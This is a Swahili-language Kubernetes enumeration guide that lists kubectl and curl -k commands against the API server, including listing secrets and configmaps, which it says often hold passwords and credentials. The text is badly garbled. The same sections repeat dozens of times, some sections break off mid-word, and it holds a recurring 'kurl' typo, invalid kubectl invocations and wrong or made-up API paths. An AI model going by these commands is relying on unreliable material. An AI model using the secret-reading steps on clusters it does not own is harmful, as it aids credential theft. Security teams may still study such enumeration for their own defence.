    kubectl port-forward -n kube-system kube-proxy-<id> 10249

Kuchunguza Kubelet Metrics

  1. Kuchunguza Kubelet Metrics

    kubectl port-forward -n kube-system kubelet-<id> 10255

Kuchunguza Kubelet Healthz

  1. Kuchunguza Kubelet Healthz

    kubectl port-forward -n kube-system kubelet-<id> 10248

Kuchunguza Kubelet Logs

  1. Kuchunguza Kubelet Logs

    kubectl logs -n kube-system kubelet-<id>

Kuchunguza Kube-Proxy Logs

  1. Kuchunguza Kube-Proxy Logs

    kubectl logs -n kube-system kube-proxy-<id>

Kuchunguza Etcd Logs

  1. Kuchunguza Etcd Logs

    kubectl logs -n kube-system etcd-<id>

Kuchunguza CoreDNS Logs

  1. Kuchunguza CoreDNS Logs

    kubectl logs -n kube-system coredns-<id>

Kuchunguza Kube-Controller-Manager Logs

  1. Kuchunguza Kube-Controller-Manager Logs

    kubectl logs -n kube-system kube-controller-manager-<id>

Kuchunguza Kube-Scheduler Logs

  1. Kuchunguza Kube-Scheduler Logs

    kubectl logs -n kube-system kube-scheduler-<id>

Kuchunguza Kube-API-Server Logs

  1. Kuchunguza Kube-API-Server Logs

    kubectl logs -n kube-system kube-apiserver-<id>

Kuchunguza Kube-Proxy Logs

  1. Kuchunguza Kube-Proxy Logs

    kubectl logs -n kube-system kube-proxy-<id>

Kuchunguza Kubelet Logs

  1. Kuchunguza Kubelet Logs

    kubectl logs -n kube-system kubelet-<id>

Kuchunguza Kubelet Healthz

  1. Kuchunguza Kubelet Healthz

    kubectl port-forward -n kube-system kubelet-<id> 10248

Kuchunguza Kubelet Logs

  1. Kuchunguza Kubelet Logs

    kubectl logs -n kube-system kubelet-<id>

Kuchunguza Kube-Proxy Logs

  1. Kuchunguza Kube-Proxy Logs

    kubectl logs -n kube-system kube-proxy-<id>

Kuchunguza Etcd Logs

  1. Kuchunguza Etcd Logs

    kubectl logs -n kube-system etcd-<id>

Kuchunguza CoreDNS Logs

  1. Kuchunguza CoreDNS Logs

    kubectl logs -n kube-system coredns-<id>

Kuchunguza Kube-Controller-Manager Logs

  1. Kuchunguza Kube-Controller-Manager Logs

    kubectl logs -n kube-system kube-controller-manager-<id>

Kuchunguza Kube-Scheduler Logs

  1. Kuchunguza Kube-Scheduler Logs

    kubectl logs -n kube-system kube-scheduler-<id>

Kuchunguza Kube-API-Server Logs

  1. Kuchunguza Kube-API-Server Logs

    kubectl logs -n kube-system kube-apiserver-<id>

Kuchunguza Kube-Proxy Logs

  1. Kuchunguza Kube-Proxy Logs

    kubectl logs -n kube-system kube-proxy-<id>

Kuchunguza Kubelet Logs

  1. Kuchunguza Kubelet Logs

    kubectl logs -n kube-system kubelet-<id>

Kuchunguza Kubelet Healthz

  1. Kuchunguza Kubelet Healthz

    kubectl port-forward -n kube-system kubelet-<id> 10248

Kuchunguza Kubelet Logs

  1. Kuchunguza Kubelet Logs

    kubectl logs -n kube-system kubelet-<id>

Kuchunguza Kube-Proxy Logs

  1. Kuchunguza Kube-Proxy Logs

    kubectl logs -n kube-system kube-proxy-<id>

Kuchunguza Etcd Logs

  1. Kuchunguza Etcd Logs

    kubectl logs -n kube-system etcd-<id>

Kuchunguza CoreDNS Logs

  1. Kuchunguza CoreDNS Logs

    kubectl logs -n kube-system coredns-<id>

Kuchunguza Kube-Controller-Manager Logs

  1. Kuchunguza Kube-Controller-Manager Logs

    kubectl logs -n kube-system kube-controller-manager-<id>

Kuchunguza Kube-Scheduler Logs

  1. Kuchunguza Kube-Scheduler Logs

    kubectl logs -n kube-system kube-scheduler-<id>

Kuchunguza Kube-API-Server Logs

  1. Kuchunguza Kube-API-Server Logs

    kubectl logs -n kube-system kube-apiserver-<id>

Kuchunguza Kube-Proxy Logs

  1. Kuchunguza Kube-Proxy Logs

    kubectl logs -n kube-system kube-proxy-<id>

Kuchunguza Kubelet Logs

  1. Kuchunguza Kubelet Logs

    kubectl logs -n kube-system kubelet-<id>

Kuchunguza Kubelet Healthz

  1. Kuchunguza Kubelet Healthz

    kubectl port-forward -n kube-system kubelet-<id> 10248

Kuchunguza Kubelet Logs

  1. Kuchunguza Kubelet Logs

    kubectl logs -n kube-system kubelet-<id>

Kuchunguza Kube-Proxy Logs

  1. Kuchunguza Kube-Proxy Logs

    kubectl logs -n kube-system kube-proxy-<id>

Kuchunguza Etcd Logs

  1. Kuchunguza Etcd Logs

    kubectl logs -n kube-system etcd-<id>

Kuchunguza CoreDNS Logs

  1. Kuchunguza CoreDNS Logs

    kubectl logs -n kube-system coredns-<id>

Kuchunguza Kube-Controller-Manager Logs

  1. Kuchunguza Kube-Controller-Manager Logs

    kubectl logs -n kube-system kube-controller-manager-<id>

Kuchunguza Kube-Scheduler Logs

  1. Kuchunguza Kube-Scheduler Logs

    kubectl logs -n kube-system kube-scheduler-<id>

Kuchunguza Kube-API-Server Logs

  1. Kuchunguza Kube-API-Server Logs

    kubectl logs -n kube-system kube-apiserver-<id>

Kuchunguza Kube-Proxy Logs

  1. Kuchunguza Kube-Proxy Logs

    kubectl logs -n kube-system kube-proxy-<id>

Kuchunguza Kubelet Logs

  1. Kuchunguza Kubelet Logs

    kubectl logs -n kube-system kubelet-<id>

Kuchunguza Kubelet Healthz

  1. Kuchunguza Kubelet Healthz

    kubectl port-forward -n kube-system kubelet-<id> 10248

Kuchunguza Kubelet Logs

  1. Kuchunguza Kubelet Logs

    kubectl logs -n kube-system kubelet-<id>

Kuchunguza Kube-Proxy Logs

  1. Kuchunguza Kube-Proxy Logs

    kubectl logs -n kube-system kube-proxy-<id>

Kuchunguza Etcd Logs

  1. Kuchunguza Etcd Logs

    kubectl logs -n kube-system etcd-<id>

Kuchunguza CoreDNS Logs

  1. Kuchunguza CoreDNS Logs

    kubectl logs -n kube-system coredns-<id>

Kuchunguza Kube-Controller-Manager Logs

  1. Kuchunguza Kube-Controller-Manager Logs

    kubectl logs -n kube-system kube-controller-manager-<id>

Kuchunguza Kube-Scheduler Logs

  1. Kuchunguza Kube-Scheduler Logs

    kubectl logs -n kube-system kube-scheduler-<id>

Kuchunguza Kube-API-Server Logs

  1. **Kuchungu

kurl -v https://$APISERVER/apis/extensions/v1beta1/namespaces/default/daemonsets

Pata kazi ya cron

Kazi za cron huruhusu kupanga kutumia sintaksia ya crontab uzinduzi wa kikasha ambacho kitatekeleza kitendo fulani.

k get cronjobs

Uchunguzi wa Kubernetes

Kuchunguza API Server

  1. Kuchunguza API Server 1.1. Kupata anwani ya API Server:

    kubectl cluster-info | grep 'Kubernetes master' | awk '/http/ {print $NF}'

    1.2. Kupata toleo la API Server:

    curl -k https://<API_SERVER_ADDRESS>/version

    1.3. Kupata habari zaidi kuhusu API Server:

    curl -k https://<API_SERVER_ADDRESS>/swagger.json

  2. Kuchunguza Rasilimali za Kubernetes 2.1. Kupata orodha ya rasilimali zinazopatikana:

    curl -k https://<API_SERVER_ADDRESS>/apis

    2.2. Kupata habari zaidi kuhusu rasilimali fulani:

    curl -k https://<API_SERVER_ADDRESS>/apis/<GROUP>/<VERSION>/<RESOURCE>

  3. Kuchunguza Huduma za Kubernetes 3.1. Kupata orodha ya huduma zinazopatikana:

    curl -k https://<API_SERVER_ADDRESS>/api/v1/namespaces/<NAMESPACE>/services

    3.2. Kupata habari zaidi k kuhusu huduma fulani:

    curl -k https://<API_SERVER_ADDRESS>/api/v1/namespaces/<NAMESPACE>/services/<SERVICE_NAME>

  4. Kuchunguza Nodes za Kubernetes 4.1. Kupata orodha ya nodes zinazopatikana:

    curl -k https://<API_SERVER_ADDRESS>/api/v1/nodes

    4.2. Kupata habari zaidi kuhusu node fulani:

    curl -k https://<API_SERVER_ADDRESS>/api/v1/nodes/<NODE_NAME>

  5. Kuchunguza Storage za Kubernetes 5.1. Kupata orodha ya storage inayopatikana:

    curl -k https://<API_SERVER_ADDRESS>/api/v1/storageclasses

    5.2. Kupata habari zaidi kuhusu storage class fulani:

    curl -k https://<API_SERVER_ADDRESS>/api/v1/storageclasses/<STORAGE_CLASS_NAME>

  6. Kuchunguza Events za Kubernetes 6.1. Kupata orodha ya matukio yanayopatikana:

    curl -k https://<API_SERVER_ADDRESS>/api/v1/namespaces/<NAMESPACE>/events

    6.2. Kupata habari zaidi kuhusu tukio fulani:

    curl -k https://<API_SERVER_ADDRESS>/api/v1/namespaces/<NAMESPACE>/events/<EVENT_NAME>

  7. Kuchunguza Logs za Kubernetes 7.1. Kupata orodha ya logs zinazopatikana:

    curl -k https://<API_SERVER_ADDRESS>/api/v1/namespaces/<NAMESPACE>/pods/<POD_NAME>/log

    7.2. Kupata logs za pod fulani:

    curl -k https://<API_SERVER_ADDRESS>/api/v1/namespaces/<NAMESPACE>/pods/<POD_NAME>/log?container=<CONTAINER_NAME>

  8. Kuchunguza RBAC za Kubernetes 8.1. Kupata orodha ya majukumu yanayopatikana:

    curl -k https://<API_SERVER_ADDRESS>/apis/rbac.authorization.k8s.io/v1/clusterroles

    8.2. Kupata habari zaidi kuhusu jukumu fulani:

    curl -k https://<API_SERVER_ADDRESS>/apis/rbac.authorization.k8s.io/v1/clusterroles/<ROLE_NAME>

  9. Kuchunguza Secrets za Kubernetes 9.1. Kupata orodha ya siri zinazopatikana:

    curl -k https://<API_SERVER_ADDRESS>/api/v1/namespaces/<NAMESPACE>/secrets

    9.2. Kupata habari zaidi kuhusu siri fulani:

    curl -k https://<API_SERVER_ADDRESS>/api/v1/namespaces/<NAMESPACE>/secrets/<SECRET_NAME>

  10. Kuchunguza ConfigMaps za Kubernetes 10.1. Kupata orodha ya configmaps zinazopatikana:

    curl -k https://<API_SERVER_ADDRESS>/api/v1/namespaces/<NAMESPACE>/configmaps

    10.2. Kupata habari zaidi kuhusu configmap fulani:

    curl -k https://<API_SERVER_ADDRESS>/api/v1/namespaces/<NAMESPACE>/configmaps/<CONFIGMAP_NAME>

  11. Kuchunguza Namespaces za Kubernetes 11.1. Kupata orodha ya namespaces zinazopatikana:

    curl -k https://<API_SERVER_ADDRESS>/api/v1/namespaces

    11.2. Kupata habari zaidi kuhusu namespace fulani:

    curl -k https://<API_SERVER_ADDRESS>/api/v1/namespaces/<NAMESPACE>

  12. Kuchunguza CRDs za Kubernetes 12.1. Kupata orodha ya CRDs zinazopatikana:

    curl -k https://<API_SERVER_ADDRESS>/apis/apiextensions.k8s.io/v1/customresourcedefinitions

    12.2. Kupata habari zaidi kuhusu CRD fulani:

    curl -k https://<API_SERVER_ADDRESS>/apis/apiextensions.k8s.io/v1/customresourcedefinitions/<CRD_NAME>

  13. Kuchunguza Network Policies za Kubernetes 13.1. Kupata orodha ya sera za mtandao zinazopatikana:

    curl -k https://<API_SERVER_ADDRESS>/apis/networking.k8s.io/v1/networkpolicies

    13.2. Kupata habari zaidi kuhusu sera ya mtandao fulani:

    curl -k https://<API_SERVER_ADDRESS>/apis/networking.k8s.io/v1/namespaces/<NAMESPACE>/networkpolicies/<NETWORK_POLICY_NAME>

  14. Kuchunguza Pod Security Policies za Kubernetes 14.1. Kupata orodha ya sera za usalama wa pod zinazopatikana:

    curl -k https://<API_SERVER_ADDRESS>/apis/policy/v1beta1/podsecuritypolicies

    14.2. Kupata habari zaidi kuhusu sera ya usalama wa pod fulani:

    curl -k https://<API_SERVER_ADDRESS>/apis/policy/v1beta1/podsecuritypolicies/<POD_SECURITY_POLICY_NAME>

  15. Kuchunguza Service Accounts za Kubernetes 15.1. Kupata orodha ya akaunti za huduma zinazopatikana:

    curl -k https://<API_SERVER_ADDRESS>/api/v1/namespaces/<NAMESPACE>/serviceaccounts

    15.2. Kupata habari zaidi kuhusu akaunti ya huduma fulani:

    curl -k https://<API_SERVER_ADDRESS>/api/v1/namespaces/<NAMESPACE>/serviceaccounts/<SERVICE_ACCOUNT_NAME>

  16. Kuchunguza Custom Metrics za Kubernetes 16.1. Kupata orodha ya vipimo vya desturi vinavyopatikana:

    curl -k https://<API_SERVER_ADDRESS>/apis/custom.metrics.k8s.io/v1beta1

    16.2. Kupata habari zaidi kuhusu kipimo cha desturi fulani:

    curl -k https://<API_SERVER_ADDRESS>/apis/custom.metrics.k8s.io/v1beta1/namespaces/<NAMESPACE>/<POD_NAME>/<METRIC_NAME>

  17. Kuchunguza External Metrics za Kubernetes 17.1. Kupata orodha ya vipimo vya nje vinavyopatikana:

    curl -k https://<API_SERVER_ADDRESS>/apis/external.metrics.k8s.io/v1beta1

    17.2. Kupata habari zaidi kuhusu kipimo cha nje fulani:

    curl -k https://<API_SERVER_ADDRESS>/apis/external.metrics.k8s.io/v1beta1/namespaces/<NAMESPACE>/<METRIC_NAME>

  18. Kuchunguza Metrics Server za Kubernetes 18.1. Kupata orodha ya vipimo vinavyopatikana:

    curl -k https://<API_SERVER_ADDRESS>/apis/metrics.k8s.io/v1beta1

    18.2. Kupata habari zaidi kuhusu kipimo fulani:

    curl -k https://<API_SERVER_ADDRESS>/apis/metrics.k8s.io/v1beta1/namespaces/<NAMESPACE>/<POD_NAME>/<METRIC_NAME>

  19. Kuchunguza Ingresses za Kubernetes 19.1. Kupata orodha ya ingresses zinazopatikana:

    curl -k https://<API_SERVER_ADDRESS>/apis/networking.k8s.io/v1/ingresses

    19.2. Kupata habari zaidi kuhusu ingress fulani:

    curl -k https://<API_SERVER_ADDRESS>/apis/networking.k8s.io/v1/namespaces/<NAMESPACE>/ingresses/<INGRESS_NAME>

  20. Kuchunguza Pod Security Policies za Kubernetes 20.1. Kupata orodha ya sera za usalama wa pod zinazopatikana:

    curl -k https://<API_SERVER_ADDRESS>/apis/policy/v1beta1/podsecuritypolicies

    20.2. Kupata habari zaidi kuhusu sera ya usalama wa pod fulani:

    curl -k https://<API_SERVER_ADDRESS>/apis/policy/v1beta1/podsecuritypolicies/<POD_SECURITY_POLICY_NAME>

  21. Kuchunguza Cluster Policies za Kubernetes 21.1. Kupata orodha ya sera za kikundi zinazopatikana:

    curl -k https://<API_SERVER_ADDRESS>/apis/policy/v1beta1/clusterpodsecuritypolicies

    21.2. Kupata habari zaidi kuhusu sera ya kikundi fulani:

    curl -k https://<API_SERVER_ADDRESS>/apis/policy/v1beta1/clusterpodsecuritypolicies/<CLUSTER_POD_SECURITY_POLICY_NAME>

  22. Kuchunguza NetworkPolicies za Kubernetes 22.1. Kupata orodha ya sera za mtandao zinazopatikana:

    curl -k https://<API_SERVER_ADDRESS>/apis/networking.k8s.io/v1/networkpolicies

    22.2. Kupata habari zaidi kuhusu sera ya mtandao fulani:

    curl -k https://<API_SERVER_ADDRESS>/apis/networking.k8s.io/v1/namespaces/<NAMESPACE>/networkpolicies/<NETWORK_POLICY_NAME>

  23. Kuchunguza PodDisruptionBudgets za Kubernetes 23.1. Kupata orodha ya bajeti za kuvuruga pod zinazopatikana:

    curl -k https://<API_SERVER_ADDRESS>/apis/policy/v1beta1/poddisruptionbudgets

    23.2. Kupata habari zaidi kuhusu bajeti ya kuvuruga pod fulani:

    curl -k https://<API_SERVER_ADDRESS>/apis/policy/v1beta1/poddisruptionbudgets/<POD_DISRUPTION_BUDGET_NAME>

  24. Kuchunguza PriorityClasses za Kubernetes 24.1. Kupata orodha ya daraja za kipaumbele zinazopatikana:

    curl -k https://<API_SERVER_ADDRESS>/apis/scheduling.k8s.io/v1/priorityclasses

    24.2. Kupata habari zaidi kuhusu daraja la kipaumbele fulani:

    curl -k https://<API_SERVER_ADDRESS>/apis/scheduling.k8s.io/v1/priorityclasses/<PRIORITY_CLASS_NAME>

  25. Kuchunguza Lease za Kubernetes 25.1. Kupata orodha ya mikataba inayopatikana:

    curl -k https://<API_SERVER_ADDRESS>/apis/coordination.k8s.io/v1/leases

    25.2. Kupata habari zaidi kuhusu mkataba fulani:

    curl -k https://<API_SERVER_ADDRESS>/apis/coordination.k8s.io/v1/namespaces/<NAMESPACE>/leases/<LEASE_NAME>

  26. Kuchunguza LimitRanges za Kubernetes 26.1. Kupata orodha ya mipaka inayopatikana:

    curl -k https://<API_SERVER_ADDRESS>/api/v1/namespaces/<NAMESPACE>/limitranges

    26.2. Kupata habari zaidi kuhusu mipaka fulani:

    curl -k https://<API_SERVER_ADDRESS>/api/v1/namespaces/<NAMESPACE>/limitranges/<LIMIT_RANGE_NAME>

  27. Kuchunguza ResourceQuotas za Kubernetes 27.1. Kupata orodha ya rasilimali zilizopatikana:

    curl -k https://<API_SERVER_ADDRESS>/api/v1/namespaces/<NAMESPACE>/resourcequotas

    27.2. Kupata habari zaidi kuhusu rasilimali fulani:

    curl -k https://<API_SERVER_ADDRESS>/api/v1/namespaces/<NAMESPACE>/resourcequotas/<RESOURCE_QUOTA_NAME>

  28. Kuchunguza Horizontal Pod Autoscalers za Kubernetes 28.1. Kupata orodha ya autoscalers zinazopatikana:

    curl -k https://<API_SERVER_ADDRESS>/apis/autoscaling/v1/horizontalpodautoscalers

    28.2. Kupata habari zaidi kuhusu autoscaler fulani:

    curl -k https://<API_SERVER_ADDRESS>/apis/autoscaling/v1/namespaces/<NAMESPACE>/horizontalpodautoscalers/<AUTOSCALER_NAME>

  29. Kuchunguza PodPresets za Kubernetes 29.1. Kupata orodha ya podpresets zinazopatikana:

    curl -k https://<API_SERVER_ADDRESS>/apis/settings.k8s.io/v1/podpresets

    29.2. Kupata habari zaidi kuhusu podpreset fulani:

    curl -k https://<API_SERVER_ADDRESS>/apis/settings.k8s.io/v1/namespaces/<NAMESPACE>/podpresets/<PODPRESET_NAME>

  30. Kuchunguza PodDisruptionBudgets za Kubernetes 30.1. Kupata orodha ya bajeti za kuvuruga pod zinazopatikana:

    curl -k https://<API_SERVER_ADDRESS>/apis/policy/v1beta1/poddisruptionbudgets

    30.2. Kupata habari zaidi kuhusu bajeti ya kuvuruga pod fulani:

    curl -k https://<API_SERVER_ADDRESS>/apis/policy/v1beta1/poddisruptionbudgets/<POD_DISRUPTION_BUDGET_NAME>

  31. Kuchunguza PodSecurityPolicies za Kubernetes 31.1. Kupata orodha ya sera za usalama wa pod zinazopatikana:

    curl -k https://<API_SERVER_ADDRESS>/apis/policy/v1beta1/podsecuritypolicies

    31.2. Kupata habari zaidi kuhusu sera ya usalama wa pod fulani:

    curl -k https://<API_SERVER_ADDRESS>/apis/p
kurl -v https://$APISERVER/apis/batch/v1beta1/namespaces/<namespace>/cronjobs

Pata configMap

configMap mara nyingi ina habari nyingi na faili za mazingira ambazo hutoa kwa programu zinazofanya kazi kwenye kubernetes. Kawaida unaweza kupata nywila nyingi, siri, na vitambulisho vinavyotumiwa kuunganisha na kuthibitisha huduma nyingine za ndani/za nje.

k get configmaps # -n namespace

Uchunguzi wa Kubernetes

  1. Kutumia kubectl

    • kubectl get pods

    • kubectl get deployments

    • kubectl get services

    • kubectl get configmaps

    • kubectl get secrets

    • kubectl get pv

    • kubectl get pvc

    • kubectl get nodes

    • kubectl get namespaces

    • kubectl get roles

    • kubectl get rolebindings

    • kubectl get clusterroles

    • kubectl get clusterrolebindings

    • kubectl get events

    • kubectl get limitranges

    • kubectl get resourcequotas

    • kubectl get podsecuritypolicies

    • kubectl get networkpolicies

    • kubectl get serviceaccounts

    • kubectl get ingresses

    • kubectl get storageclasses

    • kubectl get customresourcedefinitions

    • kubectl get daemonsets

    • kubectl get replicasets

    • kubectl get statefulsets

    • kubectl get jobs

    • kubectl get cronjobs

    • kubectl get endpoints

    • kubectl get componentstatuses

    • kubectl get certificatesigningrequests

    • kubectl get mutatingwebhookconfigurations

    • kubectl get validatingwebhookconfigurations

    • kubectl get poddisruptionbudgets

    • kubectl get priorityclasses

    • kubectl get podsecurityadmission

    • kubectl get csidrivers

    • kubectl get csinodes

    • kubectl get storageversions

    • kubectl get leases

    • kubectl get events

    • kubectl get apiservices

    • kubectl get controllerrevisions

    • kubectl get tokenreviews

    • kubectl get localsubjectaccessreviews

    • kubectl get selfsubjectaccessreviews

    • kubectl get selfsubjectrulesreviews

    • kubectl get subjectaccessreviews

    • kubectl get horizontalpodautoscalers

    • kubectl get poddisruptionbudgets

    • kubectl get podsecuritypolicies

    • kubectl get clusterrolebindings

    • kubectl get clusterroles

    • kubectl get rolebindings

    • kubectl get roles

    • kubectl get serviceaccounts

    • kubectl get networkpolicies

    • kubectl get ingresses

    • kubectl get storageclasses

    • kubectl get persistentvolumeclaims

    • kubectl get persistentvolumes

    • kubectl get configmaps

    • kubectl get secrets

    • kubectl get service

    • kubectl get pod

    • kubectl get deployment

    • kubectl get namespace

    • kubectl get node

    • kubectl get pv

    • kubectl get pvc

    • kubectl get rs

    • kubectl get rc

    • kubectl get ep

    • kubectl get svc

    • kubectl get cm

    • kubectl get sa

    • kubectl get role

    • kubectl get rolebinding

    • kubectl get crd

    • kubectl get cr

    • kubectl get csr

    • kubectl get pv

    • kubectl get pvc

    • kubectl get sc

    • kubectl get ep

    • kubectl get cs

    • kubectl get ns

    • kubectl get no

    • kubectl get po

    • kubectl get rs

    • kubectl get rc

    • kubectl get sa

    • kubectl get cr json

    • kubectl get all --all-namespaces

    • kubectl get all -A

    • kubectl get all

    • kubectl get all -o wide

    • kubectl get all -o yaml

    • kubectl get all -o json

    • kubectl get all -o custom-columns=

    • kubectl get all -o custom-columns=ALL

    • kubectl get all -o custom-columns=:.metadata.name

    • kubectl get all -o custom-columns=:.metadata.namespace

    • kubectl get all -o custom-columns=:.metadata.creationTimestamp

    • kubectl get all -o custom-columns=:.metadata.labels

    • kubectl get all -o custom-columns=:.metadata.annotations

    • kubectl get all -o custom-columns=:.spec.nodeName

    • kubectl get all -o custom-columns=:.spec.host

    • kubectl get all -o custom-columns=:.spec.hostIP

    • kubectl get all -o custom-columns=:.spec.subdomain

    • kubectl get all -o custom-columns=:.spec.serviceAccountName

    • kubectl get all -o custom-columns=:.spec.terminationGracePeriodSeconds

    • kubectl get all -o custom-columns=:.spec.restartPolicy

    • kubectl get all -o custom-columns=:.spec.activeDeadlineSeconds

    • kubectl get all -o custom-columns=:.spec.dnsPolicy

    • kubectl get all - o custom-columns=:.spec.schedulerName

    • kubectl get all -o custom-columns=:.spec.securityContext

    • kubectl get all -o custom-columns=:.spec.affinity

    • kubectl get all -o custom-columns=:.spec.tolerations

      • kubectl get all -o custom-columns=:.spec.volumes

    • kubectl get all -o custom-columns=:.spec.containers

    • kubectl get all -o custom-columns=:.spec.initContainers

    • kubectl get all -o custom-columns=:.spec.imagePullSecrets

    • kubectl get all -o custom-columns=:.spec.hostname

    • kubectl get all -o custom-columns=:.spec.subdomain

    • kubectl get all -o custom-columns=:.spec.automountServiceAccountToken

    • kubectl get all -o custom-columns=:.spec.schedulerName

    • kubectl get all -o custom-columns=:.spec.securityContext

    • kubectl get all -o custom-columns=:.spec.affinity

    • kubectl get all -o custom-columns=:.spec.tolerations

    • kubectl get all -o custom-columns=:.spec.volumes

    • kubectl get all -o custom-columns=:.spec.containers

    • kubectl get all -o custom-columns=:.spec.initContainers

    • kubectl get all -o custom-columns=:.spec.imagePullSecrets

    • kubectl get all -o custom-columns=:.spec.hostname

    • kubectl get all -o custom-columns=:.spec.subdomain

    • kubectl get all -o custom-columns=:.spec.automountServiceAccountToken

    • kubectl get all -o custom-columns=:.status.phase

    • kubectl get all -o custom-columns=:.status.hostIP

    • kubectl get all -o custom-columns=:.status.podIP

    • kubectl get all -o custom-columns=:.status.startTime

    • kubectl get all -o custom-columns=:.status.containerStatuses

    • kubectl get all -o custom-columns=:.status.qosClass

    • kubectl get all -o custom-columns=:.status.conditions

    • kubectl get all -o custom-columns=:.status.message

    • kubectl get all -o custom-columns=:.status.reason

    • kubectl get all -o custom-columns=:.status.lastProbeTime

    • kubectl get all -o custom-columns=:.status.lastTransitionTime

    • kubectl get all -o custom-columns=:.status.ready

    • kubectl get all -o custom-columns=:.status.restartCount

    • kubectl get all -o custom-columns=:.status.image

    • kubectl get all -o custom-columns=:.status.imageID

    • kubectl get all -o custom-columns=:.status.containerID

    • kubectl get all -o custom-columns=:.status.started

    • kubectl get all -o custom-columns=:.status.finishedAt

    • kubectl get all -o custom-columns=:.status.reason

    • kubectl get all -o custom-columns=:.status.message

    • kubectl get all -o custom-columns=:.status.phase

    • kubectl get all -o custom-columns=:.status.podIP

    • kubectl get all -o custom-columns=:.status.qosClass

    • kubectl get all -o custom-columns=:.status.reason

    • kubectl get all -o custom-columns=:.status.startTime

    • kubectl get all -o custom-columns=:.status.containerStatuses

    • kubectl get all -o custom-columns=:.status.lastProbeTime

    • kubectl get all -o custom-columns=:.status.lastTransitionTime

    • kubectl get all -o custom-columns=:.status.ready

    • kubectl get all -o custom-columns=:.status.restartCount

    • kubectl get all -o custom-columns=:.status.image

    • kubectl get all -o custom-columns=:.status.imageID

    • kubectl get all -o custom-columns=:.status.containerID

    • kubectl get all -o custom-columns=:.status.started

    • kubectl get all -o custom-columns=:.status.finishedAt

    • kubectl get all -o custom-columns=:.status.reason

    • kubectl get all -o custom-columns=:.status.message

    • kubectl get all -o custom-columns=:.status.phase

    • kubectl get all -o custom-columns=:.status.podIP

    • kubectl get all -o custom-columns=:.status.qosClass

    • kubectl get all -o custom-columns=:.status.reason

    • kubectl get all -o custom-columns=:.status.startTime

    • kubectl get all -o custom-columns=:.status.containerStatuses

    • kubectl get all -o custom-columns=:.status.lastProbeTime

    • kubectl get all -o custom-columns=:.status.lastTransitionTime

    • kubectl get all -o custom-columns=:.status.ready

    • kubectl get all -o custom-columns=:.status.restartCount

    • kubectl get all -o custom-columns=:.status.image

    • kubectl get all -o custom-columns=:.status.imageID

    • kubectl get all -o custom-columns=:.status.containerID

    • kubectl get all -o custom-columns=:.status.started

    • kubectl get all -o custom-columns=:.status.finishedAt

    • kubectl get all -o custom-columns=:.status.reason

    • kubectl get all -o custom-columns=:.status.message

    • kubectl get all -o custom-columns=:.status.phase

    • kubectl get all -o custom-columns=:.status.podIP

    • kubectl get all -o custom-columns=:.status.qosClass

    • kubectl get all -o custom-columns=:.status.reason

    • kubectl get all -o custom-columns=:.status.startTime

    • kubectl get all -o custom-columns=:.status.containerStatuses

    • kubectl get all -o custom-columns=:.status.lastProbeTime

    • kubectl get all -o custom-columns=:.status.lastTransitionTime

    • kubectl get all -o custom-columns=:.status.ready

    • kubectl get all -o custom-columns=:.status.restartCount

    • kubectl get all -o custom-columns=:.status.image

    • kubectl get all -o custom-columns=:.status.imageID

    • kubectl get all -o custom-columns=:.status.containerID

    • kubectl get all -o custom-columns=:.status.started

    • kubectl get all -o custom-columns=:.status.finishedAt

    • kubectl get all -o custom-columns=:.status.reason

    • kubectl get all -o custom-columns=:.status.message

    • kubectl get all -o custom-columns=:.status.phase

    • kubectl get all -o custom-columns=:.status.podIP

    • kubectl get all -o custom-columns=:.status.qosClass

    • kubectl get all -o custom-columns=:.status.reason

    • kubectl get all -o custom-columns=:.status.startTime

    • kubectl get all -o custom-columns=:.status.containerStatuses

    • kubectl get all -o custom-columns=:.status.lastProbeTime

    • kubectl get all -o custom-columns=:.status.lastTransitionTime

    • kubectl get all -o custom-columns=:.status.ready

    • kubectl get all -o custom-columns=:.status.restartCount

    • kubectl get all -o custom-columns=:.status.image

    • kubectl get all -o custom-columns=:.status.imageID

    • kubectl get all -o custom-columns=:.status.containerID

    • kubectl get all -o custom-columns=:.status.started

    • kubectl get all -o custom-columns=:.status.finishedAt

    • kubectl get all -o custom-columns=:.status.reason

    • kubectl get all -o custom-columns=:.status.message

    • kubectl get all -o custom-columns=:.status.phase

    • kubectl get all -o custom-columns=:.status.podIP

    • kubectl get all -o custom-columns=:.status.qosClass

    • kubectl get all -o custom-columns=:.status.reason

    • kubectl get all -o custom-columns=:.status.startTime

    • kubectl get all -o custom-columns=:.status.containerStatuses

    • kubectl get all -o custom-columns=:.status.lastProbeTime

    • kubectl get all -o custom-columns=:.status.lastTransitionTime

    • kubectl get all -o custom-columns=:.status.ready

    • kubectl get all -o custom-columns=:.status.restartCount

    • kubectl get all -o custom-columns=:.status.image

    • kubectl get all -o custom-columns=:.status.imageID

    • kubectl get all -o custom-columns=:.status.containerID

    • kubectl get all -o custom-columns=:.status.started

    • kubectl get all -o custom-columns=:.status.finishedAt

    • kubectl get all -o custom-columns=:.status.reason

    • kubectl get all -o custom-columns=:.status.message

    • kubectl get all -o custom-columns=:.status.phase

    • kubectl get all -o custom-columns=:.status.podIP

    • kubectl get all -o custom-columns=:.status.qosClass

    • kubectl get all -o custom-columns=:.status.reason

    • kubectl get all -o custom-columns=:.status.startTime

    • kubectl get all -o custom-columns=:.status.containerStatuses

    • kubectl get all -o custom-columns=:.status.lastProbeTime

    • kubectl get all -o custom-columns=:.status.lastTransitionTime

    • kubectl get all -o custom-columns=:.status.ready

    • kubectl get all -o custom-columns=:.status.restartCount

    • kubectl get all -o custom-columns=:.status.image

    • kubectl get all -o custom-columns=:.status.imageID

    • kubectl get all -o custom-columns=:.status.containerID

    • kubectl get all -o custom-columns=:.status.started

    • kubectl get all -o custom-columns=:.status.finishedAt

    • kubectl get all -o custom-columns=:.status.reason

    • kubectl get all -o custom-columns=:.status.message

    • kubectl get all -o custom-columns=:.status.phase

    • kubectl get all -o custom-columns=:.status.podIP

    • kubectl get all -o custom-columns=:.status.qosClass

    • kubectl get all -o custom-columns=:.status.reason

    • kubectl get all -o custom-columns=:.status.startTime

    • kubectl get all -o custom-columns=:.status.containerStatuses

    • kubectl get all -o custom-columns=:.status.lastProbeTime

    • kubectl get all -o custom-columns=:.status.lastTransitionTime

    • kubectl get all -o custom-columns=:.status.ready

    • kubectl get all -o custom-columns=:.status.restartCount

    • kubectl get all -o custom-columns=:.status.image

    • kubectl get all -o custom-columns=:.status.imageID

    • kubectl get all -o custom-columns=:.status.containerID

    • kubectl get all -o custom-columns=:.status.started

    • kubectl get all -o custom-columns=:.status.finishedAt

    • kubectl get all -o custom-columns=:.status.reason

    • kubectl get all -o custom-columns=:.status.message

    • kubectl get all -o custom-columns=:.status.phase

